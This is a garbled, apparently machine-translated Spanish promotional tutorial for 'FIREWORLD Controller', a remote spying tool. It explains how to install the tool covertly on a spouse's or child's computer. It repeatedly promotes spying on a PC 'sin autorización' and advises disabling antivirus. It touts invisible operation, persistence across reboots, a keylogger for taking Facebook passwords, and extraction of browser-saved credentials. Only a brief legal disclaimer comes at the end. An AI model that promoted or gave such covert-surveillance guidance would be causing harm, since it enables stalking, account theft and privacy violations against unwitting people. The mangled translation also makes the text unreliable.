Tutoriel de instalación a distancia del software espía pc gratuito

Cómo instalar a distancia el mejor software espía para ordenador


¿Usted tuvo viento del software de espionaje FIREWORLD Controller y desean conocerlo más al tema del hecho que se preocupa para su hija víctima de bulimia o anorexia y quién hace muchos regímenes visitando sitios al tema que son nefastos a su salud?
¿Tiene dudas sobre su mujer, o sobre su marido porque le sospecha de engañarle porque pasa del tiempo sobre sitios adultos?

¿Dónde entonces su niño, su hijo, frecuenta a jóvenes golfos que le arrastran a hacer cualquier cosa y le hacen agresivo? ¿Ver lo manipula para incitarle a beber alcohol, drogarse, venderlo, y hablar de estas malas cosas en Internet?
Este artículo le hará descubrir una gran cantidad de informaciones con el fin de que sepa como hacer para cargar el mejor software espía pc a distancia, cómo instalarlo y ponerlo en sitio bajo Windows.

¡Gracias a esta artículo, usted ahorrará del tiempo y dinero, ya que el software sujeto del artículo es gratuito y posee un paquete de carácteres funcionales! ¡Continúe la lectura más bajo, usted no va sentirlo!


Vigilar a PC a distancia con el mejor software espía pc gratuito


¿Usted acaba de cargar el software espía FIREWORLD CONTROLLER, o compró su versión PRO para unos euros solamente, una suma muy económica con relación al poder de los fontionnalités añadidos?
Está seguro de tener en su posesión un producto de una calidad perfecta, para la que las fases de instalación y tutoriaux son ampliamente detallados y disponibles en línea, hasta en vídeo si usted lo desea.
Y ni qué decir tiene que en el menor problema o a la menor pregunta sobre nuestros productos, el foro dedicado está a su disposición, y usted también puede ponerse en contacto con nosotros por mail. El soporte es muy reactivo a los mensajes, usted es asegurado de recibir una respuesta en la hora, o por lo menos por el día en caso de petición fuerte.

Así como FIREWORLD Controller le permite quedar anónimo cuando espía un pc a distancia gratuitamente *, va de allí de hasta cuando utiliza el software o que compra su versión rentable: pago por Paypal o SMS TODAS + con el fin de garantizar su anonimato todavía más, pero igual, que las comunicaciones entre su ordenador y PC que controla a distancia transitan por el camarero Fireworld, la persona se dirige para espiar un pc a distancia sin autorización nunca podrá subir a ustedes y tener su dirección IP. Un poco como lo hace el hacker Parisa Tabriz para la seguridad de Google.

Guarde bien al espíritu que las instrucciones rápidas proporcionadas con el software espía pc son sumarios, y que un tutoriel detallado completo se encuentra en línea, así como al responder FAQ a las preguntas más corrientes puestas por los internautas a propósito del software de vigilancia a distancia.


Instalar el programa espía invisible gratuito FIREWORLD Controller


Instalar este software espía es cosa fácil porque bastan menos de 5 segundo: tan pronto como es cargado si usted escogió utilizar la versión gratuita, o tan pronto como su compra sea finalizada si optó por la rentable, le basta o sea con generar automáticamente un identificado para versión FREE, o sea con copiar estar pegado identificándola comprado para desbloquear inmediatamente todos los carácteres funcionales PRO del software.
Para maximizar sus posibilidades de poder espiar PC de su elección a distancia, le recomendamos desactivar los contraviruses antes y durante la utilización del programa de vigilancia pc gratuito a distancia.

Lo que hay que saber a propósito de FIREWORLD Controller es que él es totalmente invisible sobre el ordenador controlado: ningún icono en la barra de las tareas, ningún mensaje, nada. Así, es imposible verlo y usted puede espiar un pc a distancia sin autorización en todo tranquilité.
Otro punto muy laudable es el hecho que FIREWORLD Controller espía automáticamente tan pronto como el ordenador arranque, y esto sin que usted necesite volverlo a lanzar cuando el pc es arrancado de nuevo por ejemplo.

Así, él permite piratear uno commpte Facebook ** gracias al Keylogger gratuito incluido. También sepan que el software nunca le pedirá dirección mail o de contraseña; él autentifica todo único gracias a su tecnología del protocolo Auto-Auth que le permite identificarse a partir de un identificado único generado la primera vez en que usted lo lanza.


Tutoriel sobre el interfaz del mejor software espía pc


En cuanto usted habrá generado o introducido su UserID (identificándolo personal único que es su llave secreta para utilizar el software), accederá entonces al interfaz del programa.
Es desde el interfaz que usted podrá espiar un ordenador a distancia sin autorización, vigilar la actividad de sus niños, controlar un pc a distancia de manera invisible, pero igual ver las palabras de pasos a distancia o espiar lo que es golpeado en el teclado.

El interfaz se descompone en varias partes:

Tablero de izquierda

Conexión al camarero: se trata de una línea que indica si tiene ordenadores controle, y bajo cual UserId es conectado
Lista de las máquinas registradas y testigo de conexión: le presenta la totalidad de los pc que epionnez, con su actividad en tiempo real fijada al lado de un testigo rojo o verde que indica si el ordenador distante es conectado o no, y pues cuya actividad puede ser espiada a distancia gratuitamente, incluso controlarlo a distancia.
Puesta al día hacia PRO: lazo para comprar uno que identifico a PRO con el fin de aumentar los carácteres funcionales de Controller. Anote que esta sección desaparece cuando usted ya posee UserId PRO. Poner a día hacia PRO hasta puede permitir piratear una cuenta facebook a distancia.

Tablero de derecha

Datos salientes actuales: anuncio lo fechó de salida del ordenador especificado. Esto puede ser por ejemplo cuando él envía su IP, o que señala su HUESO a distancia.
Campos ID Máquina: está aquí donde usted introduce el nombre de PC sobre el cual desea hacer una operación, por ejemplo para abrir a su Keylogger, o enviarle un messsage popup, o conocer su configuración sistema.
Campos Instrucción / Commmande: con el fin de controlar el pc a distancia, usted debe introducir un encargo que hacerle hay que ejecutar. Una barra de desenfilada está disponible con el fin de fijar todos los encargos existentes y sus parámetros. No se inquiete, todos estos encargos son detallados en línea, y podrá comprender su funcionamiento en menos de 5 minutos.
Botón SEND: envía el encargo seleccionado al ordenador espiado.
Botones lector CD y Ratón: Abre y cierra el cajón del lector CD a distancia, y permita controlar el movimiento del ratón.

Menús de los deformes

Spy-Bot: abre en un editor de texto el contenido de la actividad con el día, la hora, la ventana abierta del pc vigilado. Justo una verdadera reseña histórica de la actividad que puede servir para saber lo que hacen sus niños sobre el ordenador, pero igual de estar seguro que votr emari no le engaña y no visita sitios de encuentros.
Keylogger: abre en un fichero texto todo lo que ha sido golpeado en el teclado a distancia. Así, usted podrá espiar las palabras cogidas de pasos, y los mensajes enviados sobre Facebook.
PassW: fija instantáneamente las palabras de pasos registradas en los navegantes web del pc controlado. Es una herramienta muy poderosa, que presenta de manera estructurada emails, identifiants y palabras de pasos extraídas de los navegantes de los ordenadores controlados.


Instalar el programa espía gratuito

¿Como hacer para cargar un programa espía gratuito a distancia?


Le basta o sea con rendirse aquí, o sea con buscar sobre Google " Fireworld Controller " con el fin de encontrar la página de cargamiento.
Luego, haga clic sobre "Download Now coche-extractor". El camarero va a preparar su cargamiento privado, luego a verificar si el fichero es bien tranquilizado, y finalmente enviarle a su navegante.
Abra el extractor tan obtenido; éste copiará los ficheros que serán necesarios para usted para espiar un pc a distancia sin autorización sobre su oficina en un expediente llamado Fireworld Controller.

Luego, ellos basta para usted con rendirse a este expediente, con abrir Controller.exe y con efectuar las etapas simples de puesta en marcha.
Este tutoriel de instalación para software espía pc gratuito a distancia implica a propósito de eso ciertas indicaciones, pero para más facilidad, ustedes encontrarán informaciones todavía más detalladas sobre el sitio Web de Fireworld.



Cómo utilizar el software


Cada vez que usted lanza el programa de espionaje gratuito para pc, el interfaz le señala cuáles ordenadores que vigila a distancia son conectados actualmente y listo ser controlados a a distancia.
Cuando usted acabó de utilizar el software, hace clic simplemente sobre la cruz roja arriba a la derecha con el fin de cerrar su interfaz. Anote que sobre el pc espiado, la vigilancia continuará siempre y no se parará hasta si usted apaga su ordenador.
Si usted desea parar la vigilancia hasta el prójimo redémarrage del pc espiado a distancia, le basta con enviar el encargo " closeclient ", y Controller Client se parará completamente. Él volverá a lanzar de nuevo la próxima vez que el ordenador sea arrancado de nuevo.

Ahora, usted debería estar convencido por el mejor software espía pc gratuito.
Porque si usted desea desinstalarlo completamente, esto también se hace a distancia enviando un encargo específico al ordenador. Él desinstalará entonces de manera invisible y silenciosa en menos de 10 segundo.

Para controlar un pc a distancia sin autorización, introduzca el nombre de éste en campos "ID Máquina" y una instrucción entre la lista propuesta, y haga clic finalmente sobre "Send" con el fin de hacer ejecutar el encargo en el pc a distancia.
Hay muchos encargos disponibles en Controller, y ellas todas son explicadas y detalladas sobre el sitio Web.


Las categorías de encargos del programa espía pc gratuito


Si el interfaz del mejor software espía pc a distancia puede ser descompuesto en 3 partes, la zona de las máquinas, la de los encargos y la de los Deformes, aquello que nos interesa aquí es la segunda.
Así como explicado précedemment, con el fin de controlar un pc a distancia gratuitamente, debe primero introducir el nombre de PC en campos "ID Máquina".
Luego, usted debe escoger el encargo entre las que son propuestas.

Título no exhaustivo, porque el software es mejorado permanentemente y nuevos carácteres funcionales que añaden, usted podrá hacer efectuar a distancia, introduce otras, las instrucciones siguientes: controlar el lector CD, enviar popup, devolver la pantalla negra, a bloquear y a desbloquear el ratón a distancia, a saber el nombre de sesión, la configuración sistema de la máquina, a recuperar su IP, su FAI, el géolocaliser; pero también hacer hablar PC a distancia, abrir URL, esconder y mostrar el brre de las tareas, controlar el volumen del ordenador a distancia, cerrar programas, bloquearlo, reducir las ventanas abiertas, etc...

Además, con el fin de poder testar o sea entonces sencillamente utilizar un software espía pc gratuito, hay un botón acortado para hacer abrir directamente el lector CD a distancia, y para cerrarlo.
El cajón CD es una parte física del ordenador, y es impresionante pues verlo abrirse y cerrarse a distancia. Así, usted podrá impresionar su cerco y pasar por un pirata informático fdp.

Guarde al espíritu que para tener cuidado abierto sobre las actividades de PC, usted debería volverse hacia los menús Keylogger, SpyBot y PassW, pero todavía sobre el monitoring en tiempo real del ordenador espiado.

¡Y el más bello en todo esto, es que es gratuito!

La mayoría de los carácteres funcionales descrita aquí están disponibles en la versión FREE de FIREWORD Controller. Esta versión es ilimitada en el tiempo, y usted nunca es obligado a pagar para continuar utilizándola.
Si usted desea pasar luego a la versión superior, es posible a cada momento comprar no caro el mejor software espía pc en su versión PRO con el fin de desbloquear todavía más funciones y encargos.

Cargar el mejor software espía pc gratuito
• Comprar para paso caro la versión PRO aquí

Utilizar el producto con fines de espionaje es ilegal y podría dar lugar a sanciones penales. Es la responsabilidad del usuario de Fireworld Controller verificar que su uso cumpla con todas las leyes aplicables en su país y las del país que utiliza el software. En particular, está prohibido utilizar el software con fines calificados de inadecuados y sin el conocimiento de la persona que ejecute Controller Client en su ordenador. Si tiene alguna duda, consulte a su abogado antes de utilizar nuestros productos. Lea la sección Responsabilidad para los detalles.

** Hackear una cuenta es ilegal. Si se rompe la ley, usted es responsable de sus acciones.